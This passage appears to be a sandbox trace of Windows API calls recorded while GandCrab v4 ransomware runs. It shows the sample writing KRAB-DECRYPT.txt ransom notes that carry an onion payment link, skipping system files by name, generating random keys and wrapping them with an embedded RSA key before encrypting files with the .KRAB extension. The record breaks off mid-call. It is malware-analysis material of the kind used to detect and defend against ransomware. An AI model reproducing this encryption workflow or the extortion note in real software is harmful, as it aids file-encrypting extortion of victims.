KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0057.683] WriteFile (in: hFile=0x43c, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338ed20, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338ed20*=0x1f6e, lpOverlapped=0x0) returned 1 [0057.684] CloseHandle (hObject=0x43c) returned 1 [0057.684] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.685] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.685] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x4, wMilliseconds=0x37a)) [0057.685] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.685] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0057.685] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0057.685] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\d2ca4a08d2ca4dee3d.lock") returned 71 [0057.686] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x43c [0057.688] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.688] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.688] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\") returned 48 [0057.688] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\*" [0057.688] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\*", lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 0xfbd560 [0057.688] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0057.688] FindNextFileW (in: hFindFile=0xfbd560, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0057.688] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0057.688] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0057.688] FindNextFileW (in: hFindFile=0xfbd560, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0057.688] lstrcmpW (lpString1="Access", lpString2=".") returned 1 [0057.688] lstrcmpW (lpString1="Access", lpString2="..") returned 1 [0057.688] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="Access" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access" [0057.688] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\" [0057.689] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0057.689] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0057.689] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0057.689] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0057.689] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0057.689] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.689] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.689] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\\\KRAB-DECRYPT.txt") returned 72 [0057.690] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\access\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0057.690] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0057.690] WriteFile (in: hFile=0x3ac, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338eaa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338eaa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0057.691] CloseHandle (hObject=0x3ac) returned 1 [0057.691] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.691] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.694] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x4, wMilliseconds=0x37a)) [0057.694] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.694] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0057.695] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0057.695] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\d2ca4a08d2ca4dee3d.lock") returned 78 [0057.695] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\access\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3ac [0057.699] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.699] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.700] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\") returned 55 [0057.700] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\*" [0057.700] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\*", lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0xfbd5a0 [0057.700] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0057.700] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0057.700] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0057.700] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0057.700] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0057.700] lstrcmpW (lpString1="AccessCache.accdb", lpString2=".") returned 1 [0057.700] lstrcmpW (lpString1="AccessCache.accdb", lpString2="..") returned 1 [0057.700] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\", lpString2="AccessCache.accdb" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\AccessCache.accdb") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\AccessCache.accdb" [0057.700] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0057.700] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\AccessCache.accdb.KRAB") returned 77 [0057.700] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\AccessCache.accdb") returned 72 [0057.700] lstrlenW (lpString=".accdb") returned 6 [0057.700] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.701] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".accdb ") returned 7 [0057.701] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.701] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\AccessCache.accdb") returned 72 [0057.701] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\AccessCache.accdb") returned 72 [0057.701] lstrcmpiW (lpString1="AccessCache.accdb", lpString2="desktop.ini") returned -1 [0057.701] lstrcmpiW (lpString1="AccessCache.accdb", lpString2="autorun.inf") returned -1 [0057.701] lstrcmpiW (lpString1="AccessCache.accdb", lpString2="ntuser.dat") returned -1 [0057.701] lstrcmpiW (lpString1="AccessCache.accdb", lpString2="iconcache.db") returned -1 [0057.701] lstrcmpiW (lpString1="AccessCache.accdb", lpString2="bootsect.bak") returned -1 [0057.701] lstrcmpiW (lpString1="AccessCache.accdb", lpString2="boot.ini") returned -1 [0057.701] lstrcmpiW (lpString1="AccessCache.accdb", lpString2="ntuser.dat.log") returned -1 [0057.701] lstrcmpiW (lpString1="AccessCache.accdb", lpString2="thumbs.db") returned -1 [0057.701] lstrcmpiW (lpString1="AccessCache.accdb", lpString2="KRAB-DECRYPT.html") returned -1 [0057.701] lstrcmpiW (lpString1="AccessCache.accdb", lpString2="KRAB-DECRYPT.txt") returned -1 [0057.701] lstrcmpiW (lpString1="AccessCache.accdb", lpString2="CRAB-DECRYPT.txt") returned -1 [0057.701] lstrcmpiW (lpString1="AccessCache.accdb", lpString2="ntldr") returned -1 [0057.701] lstrcmpiW (lpString1="AccessCache.accdb", lpString2="NTDETECT.COM") returned -1 [0057.701] lstrcmpiW (lpString1="AccessCache.accdb", lpString2="Bootfont.bin") returned -1 [0057.701] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0057.702] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0xfbca90) returned 1 [0057.702] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0057.702] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0057.703] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0057.703] CryptGenRandom (in: hProv=0xfbca90, dwLen=0x20, pbBuffer=0x338ea4c | out: pbBuffer=0x338ea4c) returned 1 [0057.703] CryptReleaseContext (hProv=0xfbca90, dwFlags=0x0) returned 1 [0057.703] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.703] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0xfbca90) returned 1 [0057.703] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0057.704] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0057.704] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0057.704] CryptGenRandom (in: hProv=0xfbca90, dwLen=0x8, pbBuffer=0x338ea6c | out: pbBuffer=0x338ea6c) returned 1 [0057.704] CryptReleaseContext (hProv=0xfbca90, dwFlags=0x0) returned 1 [0057.704] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0057.704] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0xfbca90) returned 1 [0057.705] CryptImportKey (in: hProv=0xfbca90, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbd520) returned 1 [0057.705] CryptGetKeyParam (in: hKey=0xfbd520, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0057.705] CryptEncrypt (in: hKey=0xfbd520, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0057.705] GetLastError () returned 0x0 [0057.705] CryptDestroyKey (hKey=0xfbd520) returned 1 [0057.705] CryptReleaseContext (hProv=0xfbca90, dwFlags=0x0) returned 1 [0057.705] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0xfbca90) returned 1 [0057.706] CryptImportKey (in: hProv=0xfbca90, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbd7a0) returned 1 [0057.706] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0057.706] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0057.706] GetLastError () returned 0x0 [0057.706] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0057.706] CryptReleaseContext (hProv=0xfbca90, dwFlags=0x0) returned 1 [0057.706] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\AccessCache.accdb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\access\\accesscache.accdb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, 